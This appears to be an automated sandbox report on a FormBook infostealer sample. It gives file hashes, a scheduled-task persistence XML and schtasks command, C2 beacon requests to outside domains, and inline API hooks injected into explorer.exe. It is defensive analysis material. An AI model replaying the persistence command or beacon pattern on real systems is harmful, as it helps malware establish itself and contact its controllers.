Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>t

C:\Users\user\AppData\Roaming\fgEePtnFJH.exe Download File
Process:	C:\Users\user\Desktop\gzU8odwaPalRTGB.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	659456
Entropy (8bit):	7.6004326422021
Encrypted:	false
SSDEEP:	12288:/0u4sFfsLEPk2K+xaEMJpxhgiYv3Y/McfQ5WOiOP5DPh6h:/0u4csWki4EUpxhlYv+6WOi45l
MD5:	BC0859493D8419F5FFE0468D23938256
SHA1:	70C3B42DB2FC29BB0DE21DB911B85ADF600FB9F2
SHA-256:	64F1791681E261B0E652130F8F7FCA8E1098A4C03FEE49652A14D682681F85CF
SHA-512:	BF6CC0550EC21E2E4F829552A289D2E0414FD8DA1085E5E48588A114C6B2A4CB0ED3869513DA89E4FD5172A40AEAA2206578F53F867119CB8E8342CEC9292927
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 29%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n`..............P.............2.... ...@....@.. ....................................@.....................................O....@.......................`....................................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................H.......\|...do...........................................................0............(,...(-.........(.....o..........................(/......(0......(1......(2......(3....N..(....oK...(4....&..(5.....s6........s7........s8........s9........s:............0...........~....o;....+...0...........~....o<....+...0...........~....o=....+...0...........~....o>....+...0...........~....o?....+..&..(@....*...0..<........~.....(A.....,!r...p.....(B...oC...sD............~.....

C:\Users\user\AppData\Roaming\fgEePtnFJH.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\gzU8odwaPalRTGB.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.6004326422021
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	gzU8odwaPalRTGB.exe
File size:	659456
MD5:	bc0859493d8419f5ffe0468d23938256
SHA1:	70c3b42db2fc29bb0de21db911b85adf600fb9f2
SHA256:	64f1791681e261b0e652130f8f7fca8e1098a4c03fee49652a14d682681f85cf
SHA512:	bf6cc0550ec21e2e4f829552a289d2e0414fd8da1085e5e48588a114c6b2a4cb0ed3869513da89e4fd5172a40aeaa2206578f53f867119cb8e8342cec9292927
SSDEEP:	12288:/0u4sFfsLEPk2K+xaEMJpxhgiYv3Y/McfQ5WOiOP5DPh6h:/0u4csWki4EUpxhlYv+6WOi45l
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....n`..............P.............2.... ...@....@.. ....................................@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4a1f32
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x606E9095 [Thu Apr 8 05:11:49 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add dword ptr [eax], eax
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
or byte ptr [eax], al
add byte ptr [eax], al
or eax, 0C000000h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], al
add byte ptr [edx], cl
add byte ptr [eax], al
add byte ptr [esi], cl
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [eax+eax], cl
add byte ptr [eax], al
push cs
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], cl
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], al
add byte ptr [eax], cl
add byte ptr [eax], al
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [esi], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
pop es
add byte ptr [eax], al
add byte ptr [eax+eax], cl
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
push es
add byte ptr [eax], al
add byte ptr [edx], cl
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
or al, byte ptr [eax]
add byte ptr [eax], al
push cs
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], cl
add byte ptr [eax], al
add byte ptr [eax+eax], cl
add byte ptr [eax], al
add eax, 00000000h
add byte ptr [eax], al
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al
or eax, dword ptr [eax]
add byte ptr [eax], al
or eax, dword ptr [eax]
add byte ptr [eax], al
or al, 00h
add byte ptr [eax], al
or eax, 02000000h
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [edx], al
add byte ptr [eax], al
add byte ptr [esi], cl
add byte ptr [eax], al
add byte ptr [00000000h], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa1ee0	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa4000	0x5e4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xa6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa0468	0xa0600	False	0.778837137081	data	7.60992842493	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xa4000	0x5e4	0x600	False	0.427083333333	data	4.15888435005	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xa6000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0xa4090	0x354	data
RT_MANIFEST	0xa43f4	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
LegalCopyright	Copyright 2015
Assembly Version	1.0.0.0
InternalName	ExceptionFromErrorCode.exe
FileVersion	1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName	Codewords
ProductVersion	1.0.0.0
FileDescription	Codewords
OriginalFilename	ExceptionFromErrorCode.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 13:13:25.156274080 CEST	49717	80	192.168.2.5	162.0.213.203
Apr 8, 2021 13:13:25.332215071 CEST	80	49717	162.0.213.203	192.168.2.5
Apr 8, 2021 13:13:25.332365036 CEST	49717	80	192.168.2.5	162.0.213.203
Apr 8, 2021 13:13:25.332544088 CEST	49717	80	192.168.2.5	162.0.213.203
Apr 8, 2021 13:13:25.509648085 CEST	80	49717	162.0.213.203	192.168.2.5
Apr 8, 2021 13:13:25.626167059 CEST	80	49717	162.0.213.203	192.168.2.5
Apr 8, 2021 13:13:25.626189947 CEST	80	49717	162.0.213.203	192.168.2.5
Apr 8, 2021 13:13:25.626420975 CEST	49717	80	192.168.2.5	162.0.213.203
Apr 8, 2021 13:13:25.626506090 CEST	49717	80	192.168.2.5	162.0.213.203
Apr 8, 2021 13:13:25.801995039 CEST	80	49717	162.0.213.203	192.168.2.5
Apr 8, 2021 13:13:46.157308102 CEST	49724	80	192.168.2.5	154.203.184.76
Apr 8, 2021 13:13:47.295140982 CEST	80	49724	154.203.184.76	192.168.2.5
Apr 8, 2021 13:13:47.295383930 CEST	49724	80	192.168.2.5	154.203.184.76
Apr 8, 2021 13:13:47.295574903 CEST	49724	80	192.168.2.5	154.203.184.76
Apr 8, 2021 13:13:47.786096096 CEST	49724	80	192.168.2.5	154.203.184.76
Apr 8, 2021 13:13:48.450500965 CEST	80	49724	154.203.184.76	192.168.2.5
Apr 8, 2021 13:13:48.450757027 CEST	49724	80	192.168.2.5	154.203.184.76
Apr 8, 2021 13:13:48.930546045 CEST	80	49724	154.203.184.76	192.168.2.5
Apr 8, 2021 13:13:48.930716038 CEST	49724	80	192.168.2.5	154.203.184.76

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 13:11:59.560247898 CEST	64344	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:11:59.574738979 CEST	53	64344	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:01.348618031 CEST	62060	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:01.361320972 CEST	53	62060	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:02.522334099 CEST	61805	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:02.534804106 CEST	53	61805	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:05.222836971 CEST	54795	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:05.240916967 CEST	53	54795	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:08.630891085 CEST	49557	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:08.643330097 CEST	53	49557	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:09.443159103 CEST	61733	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:09.456541061 CEST	53	61733	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:11.409358978 CEST	65447	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:11.422105074 CEST	53	65447	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:13.498258114 CEST	52441	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:13.511040926 CEST	53	52441	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:14.723562002 CEST	62176	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:14.737255096 CEST	53	62176	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:16.990760088 CEST	59596	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:17.003192902 CEST	53	59596	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:17.709403992 CEST	65296	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:17.722126007 CEST	53	65296	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:21.815046072 CEST	63183	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:21.852550983 CEST	53	63183	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:34.478744030 CEST	60151	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:34.491386890 CEST	53	60151	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:48.010639906 CEST	56969	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:48.029495955 CEST	53	56969	8.8.8.8	192.168.2.5
Apr 8, 2021 13:12:53.020457029 CEST	55161	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:12:53.041142941 CEST	53	55161	8.8.8.8	192.168.2.5
Apr 8, 2021 13:13:21.754930019 CEST	54757	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:13:21.767719984 CEST	53	54757	8.8.8.8	192.168.2.5
Apr 8, 2021 13:13:25.104145050 CEST	49992	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:13:25.148941040 CEST	53	49992	8.8.8.8	192.168.2.5
Apr 8, 2021 13:13:29.258407116 CEST	60075	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:13:29.276210070 CEST	53	60075	8.8.8.8	192.168.2.5
Apr 8, 2021 13:13:44.359870911 CEST	55016	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:13:44.386131048 CEST	53	55016	8.8.8.8	192.168.2.5
Apr 8, 2021 13:13:45.827178955 CEST	64345	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:13:46.156172037 CEST	53	64345	8.8.8.8	192.168.2.5
Apr 8, 2021 13:13:56.760621071 CEST	57128	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:13:56.773353100 CEST	53	57128	8.8.8.8	192.168.2.5
Apr 8, 2021 13:13:58.713129044 CEST	54791	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:13:58.745508909 CEST	53	54791	8.8.8.8	192.168.2.5
Apr 8, 2021 13:14:05.960927963 CEST	50463	53	192.168.2.5	8.8.8.8
Apr 8, 2021 13:14:06.304905891 CEST	53	50463	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 8, 2021 13:13:25.104145050 CEST	192.168.2.5	8.8.8.8	0x29fc	Standard query (0)	www.novergi.com	A (IP address)	IN (0x0001)
Apr 8, 2021 13:13:45.827178955 CEST	192.168.2.5	8.8.8.8	0xdbf5	Standard query (0)	www.realsults.com	A (IP address)	IN (0x0001)
Apr 8, 2021 13:14:05.960927963 CEST	192.168.2.5	8.8.8.8	0x4b1a	Standard query (0)	www.primarewards.net	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 8, 2021 13:13:25.148941040 CEST	8.8.8.8	192.168.2.5	0x29fc	No error (0)	www.novergi.com		162.0.213.203	A (IP address)	IN (0x0001)
Apr 8, 2021 13:13:46.156172037 CEST	8.8.8.8	192.168.2.5	0xdbf5	No error (0)	www.realsults.com		154.203.184.76	A (IP address)	IN (0x0001)
Apr 8, 2021 13:14:06.304905891 CEST	8.8.8.8	192.168.2.5	0x4b1a	Server failure (2)	www.primarewards.net	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

www.novergi.com

www.realsults.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49717	162.0.213.203	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 13:13:25.332544088 CEST	1208	OUT	GET /msc/?szr8=ZuDCMQ3I4T3VSTegk+AGxuqfe6TeNyWCjdwuw+un6PC0oplRc+HjqgF4wozRSCgma/XR&4hnPsj=W2J4SLjHGHypclVp HTTP/1.1 Host: www.novergi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 13:13:25.626167059 CEST	1209	IN	HTTP/1.1 404 Not Found Date: Thu, 08 Apr 2021 11:13:25 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 327 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6d 73 63 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /msc/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49724	154.203.184.76	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 8, 2021 13:13:47.295574903 CEST	4469	OUT	GET /msc/?szr8=SLnxv5WEj6Yhjlrb8B4FzKU74ag+VtkikWCAHb2VKlwGrAtgyss6rL13pJnEzWIQGWFv&4hnPsj=W2J4SLjHGHypclVp HTTP/1.1 Host: www.realsults.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Apr 8, 2021 13:13:48.450500965 CEST	4470	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/8.5 Date: Thu, 08 Apr 2021 11:13:46 GMT Connection: close Content-Length: 1163 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e c4 fa d2 aa b2 e9 d5 d2 b5 c4 d7 ca d4 b4 bf c9 c4 dc d2 d1 b1 bb c9 be b3 fd a3 ac d2 d1 b8 fc b8 c4 c3 fb b3 c6 bb f2 d5 df d4 dd ca b1 b2 bb bf c9 d3 c3 a1 a3 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73 65 74 3e 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312"/><title>404 - </title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1></h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - </h2> <h3></h3> </fieldset></div></div></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE6
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE6
GetMessageW	INLINE	0x48 0x8B 0xB8 0x84 0x4E 0xE6
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8C 0xCE 0xE6

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: gzU8odwaPalRTGB.exe PID: 3092 Parent PID: 5684

General

Start time:	13:12:06
Start date:	08/04/2021
Path:	C:\Users\user\Desktop\gzU8odwaPalRTGB.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\gzU8odwaPalRTGB.exe'
Imagebase:	0xd50000
File size:	659456 bytes
MD5 hash:	BC0859493D8419F5FFE0468D23938256
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.261174361.0000000003136000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2596 Parent PID: 3092

General

Start time:	13:12:16
Start date:	08/04/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp'
Imagebase:	0x910000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 248 Parent PID: 2596

General

Start time:	13:12:17
